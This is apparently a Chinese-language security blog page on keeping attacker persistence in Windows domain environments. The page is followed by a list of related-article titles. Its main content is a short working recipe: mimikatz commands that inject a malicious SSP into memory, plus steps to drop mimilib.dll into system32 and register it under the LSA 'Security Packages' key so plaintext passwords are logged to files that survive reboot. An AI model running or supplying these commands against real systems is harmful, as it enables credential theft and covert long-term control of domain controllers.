权限维持:为攻击者创造出稳定的输出

域环境的权限维持、单机版的权限维持、web权限维持

#内网域-权限维持-基于验证DLL加载-SSP

启用mimikatz需要用管理员身份

方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失

privilege::debug

misc::memssp

C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)

方法二:使用此方法即使系统重启,也不会影响到持久化的效果

1、mimilib.dll 传到目标域控的c:\windows\system32\目录下

2、修改注册表,重启生效

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

c:\windows\system32\kiwissp.log 记录账号密码文件

在实战中一般都是将两种方法同时一起使用

内网安全--权限维持相关推荐

  1. proxychains代理扫描并获取内网服务器权限

    Proxychains Proxychains是为了GNU\Linux操作系统而开发的工具,任何TCP连接都可以通过TOR或者SOCKS4,SOCKS5,HTTP/HTTPS路由到目的地.在这个通道技 ...

  2. 我是如何通过命令执行到最终获取内网Root权限的

    简介 此前我曾发表过一篇ltr101的文章,这是我该系列的第二篇.本文我将为大家展示最近我在赏金计划中,发现的一个非常cool的漏洞.以及我是如何通过一个废弃的Web服务器实现远程执行代码的,并最终成 ...

  3. 内网渗透-----权限分析及防御

    第四章 权限提升分析及防御 生成MSF木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.2 lport=1234 -f exe ...

  4. 谷歌VirusTotal开源组件曝高危漏洞,可获取内网访问权限

    如漏洞遭利用,可导致攻击者不仅访问受谷歌控制的环境,还可以高权限访问50多个内部主机. 安全研究员在 VirusTotal 平台上发现了一个严重漏洞,可被用于实现远程代码执行 (RCE). 该漏洞已修 ...

  5. [内网渗透]—权限维持

    域权限维持 Skeleton Key(万能密码) 原理 当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这 ...

  6. 企业安全挑战 内网安全技术十大策略

    几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素.然而,Intranet内部的***和***却依然猖狂.事实证明,公司内部的不安全因素远比外 ...

  7. 工控攻防演示——从外网到内网控制系统设备的入侵

    给实验室写的文章,在安全客上发表,在这里再发下 一.概述 实验目的通过工控靶场学习web渗透.内网渗透.工控安全相关知识技能. 靶场信息本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中 ...

  8. 利用被入侵的路由器迈入内网——抓包,利用路由器漏洞入侵,进行流量劫持...

    from:https://www.anquanke.com/post/id/82638 去年开始利用路由器对目标内网进行渗透的方式方法开始研究,测试了一阵了.看到乌云之前有一篇翻译外国人的文章,讲路由 ...

  9. 企业内网安全十大防护策略

    几乎所有企业对于网络安全的重视程度一下子提高了,纷纷采购防火墙等设备希望堵住来自Internet的不安全因素.然而,Intranet内部的***和***却依然猖狂.事实证明,公司内部的不安全因素远比外 ...

最新文章

  1. k8s实战之数据卷(volume)
  2. 分享Silverlight/WPF/Windows Phone一周学习导读(10月16日-10月22日)
  3. CCNA重点难点:思科交换机生成树配置
  4. 传统登录实现方式问题思考
  5. Flask的csrf_token校验
  6. Cloud一分钟 | 华为云、腾讯云、阿里云中标「央视2018年租赁公有云服务」项目...
  7. linux环型共享内存,Linux system v 共享内存
  8. J2ME游戏中的图片处理
  9. vuedraggable嵌套块拖拽_Vue 基于 vuedraggable 实现选中、拖拽、排序效果
  10. 论文阅读笔记:《Contextual String Embeddings for Sequence Labeling》
  11. 【MATLAB】三维曲线(plot3)
  12. 太原理工大学这两年程序设计等竞赛奖牌统计
  13. NAT综合实验(华为)
  14. ORCAD PSPICE 仿真学习
  15. 说说几种常用的前端缓存
  16. java强引用不会被回收_强引用(Strong Reference)-不回收
  17. 【本人秃顶程序员】图解分布式架构的演进过程
  18. UEditor之图片上传如何和真实项目结合
  19. 联想a366t 刷android4,联想A366t线刷刷机教程(刷官方rom)
  20. 5G无线网节能关键技术

热门文章

  1. 如何使用伦敦金画出支撑阻力线
  2. pt mysql_pt(Percona Toolkit)工具详解:(二)工具介绍
  3. PT站点签到脚本,可挂青龙面板自动签到
  4. 就地初始化与列表初始化
  5. 【解决报错】java.sql.SQLException: Access denied for user 'root'@'localhost' (using password: YES)
  6. dxc 3.0 线程的生命周期
  7. 10.从头开始做服务端
  8. 数字滤波器的实现——低通滤波器再探究
  9. “笨办法”学Python3,Zed A. Shaw,习题33
  10. 高效管理顾客体验,提升顾客转化的王牌选择